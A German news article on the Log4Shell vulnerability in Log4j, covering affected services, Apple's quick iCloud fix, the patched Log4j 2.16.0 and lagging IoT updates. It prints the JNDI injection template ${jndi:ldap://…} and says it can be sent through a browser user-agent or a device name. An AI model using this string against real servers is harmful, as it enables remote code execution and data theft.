Log4Shell – dieser Begriff bereitet großen und kleinen Tech-Unternehmen, Cloud-Anbietern und sogar Autoherstellern sowie deren Administratoren seit einigen Tagen großes Kopfzerbrechen und sorgt für viel Arbeit. Unter diesem Namen wurde nämlich eine kürzlich entdeckte Schwachstelle bekannt, welche zahlreiche Systeme gefährdet, darunter so bekannte Dienste wie iCloud, Twitter, Steam und Amazon, aber auch Tesla, Google und LinkedIn. Allen gemeinsam ist, dass sie die Java-Komponente Log4j einsetzen, die eine gefährliche Sicherheitslücke aufweist.


Schwachstelle in Log4j ermöglicht gefährliche Angriffe
Die von der Apache Software Foundation entwickelte Bibliothek dient dem Logging von Meldungen in Anwendungen, welche in Java programmiert sind. Im Zusammenspiel mit dem Java Naming and Directory Interface (JNDI) lässt sie sich allerdings dazu missbrauchen, auf einem Server nahezu beliebigen Code auszuführen. Angreifer müssen hierfür lediglich eine Zeichenkette übermitteln, welche dem Format ${jndi:ldap://[Adresse]/[Payload]} entspricht. Der Angriff kann somit etwa durch eine entsprechend konfigurierte Browserkennung initiiert werden, aber beispielsweise auch durch den böswillig definierten Namen eines iPhones. Wegen der weltweiten Verbreitung von Log4j stellt die Sicherheitslücke eine große Gefahr dar. Sie ermöglicht unter anderem das Abgreifen von Login-Informationen, Ransomware-Angriffe und die Installation von Krypto-Minern auf den betroffenen Systemen.

Apple hat iCloud schnell abgedichtet
MacBook, iMac, Mac mini und Mac Pro sind nach derzeitigem Kenntnisstand in aller Regel nicht unmittelbar von den Problem betroffen. Eine direkte Gefahr für die Computer aus Cupertino besteht vermutlich nur, wenn auf diesen Anwendungen oder Dienste genutzt werden, welche Log4j für die Protokollierung einsetzen und zudem eingehende Verbindungen aus dem Internet akzeptieren. Eine mittelbare Bedrohung stellen jedoch Cloud-Services und andere Dienste dar, mit welchen sich die Rechner verbinden, also etwa iCloud, Twitter, Amazon Web Services oder CloudFlare. Die Anbieter müssen ihre Systeme so schnell wie möglich patchen, um Angriffe auf ihre Infrastruktur mithilfe von Log4Shell abwehren zu können. Apple hat bereits entsprechende Schritte unternommen. Howard Oakley berichtet in seinem Blog The Eclectic Light Company, dass Sicherheitsforscher noch am 9. und 10. Dezember die Anfälligkeit von iCloud nachweisen konnten, am 11. Dezember war die Sicherheitslücke dann auf den Servern des kalifornischen Unternehmens geschlossen.

Apache veröffentlicht abgesicherte Version von Log4j
Apache hat mittlerweile Version 2.16.0 von Log4j veröffentlicht, in dieser ist die Schwachstelle behoben. Angesichts der Vielzahl der Webseiten, Dienste und Anbieter, welche die Bibliothek einsetzen, kann es allerdings einige Zeit dauern, bis die Sicherheitslücke weltweit geschlossen ist. Da die Java-Komponente zudem in zahlreichen IoT-Geräten wie Video-Überwachungssystemen oder auch WLAN-Routern zu finden ist, dürfte die Gefahr noch länger bestehen. Viele derartige Devices erhalten erfahrungsgemäß nur sehr schleppend Updates, wenn überhaupt. Der Hersteller Ubiquiti zumindest hat für die hauseigenen Mesh-Systeme bereits eine Aktualisierung seines Tools UniFi Network Application zur Verfügung gestellt.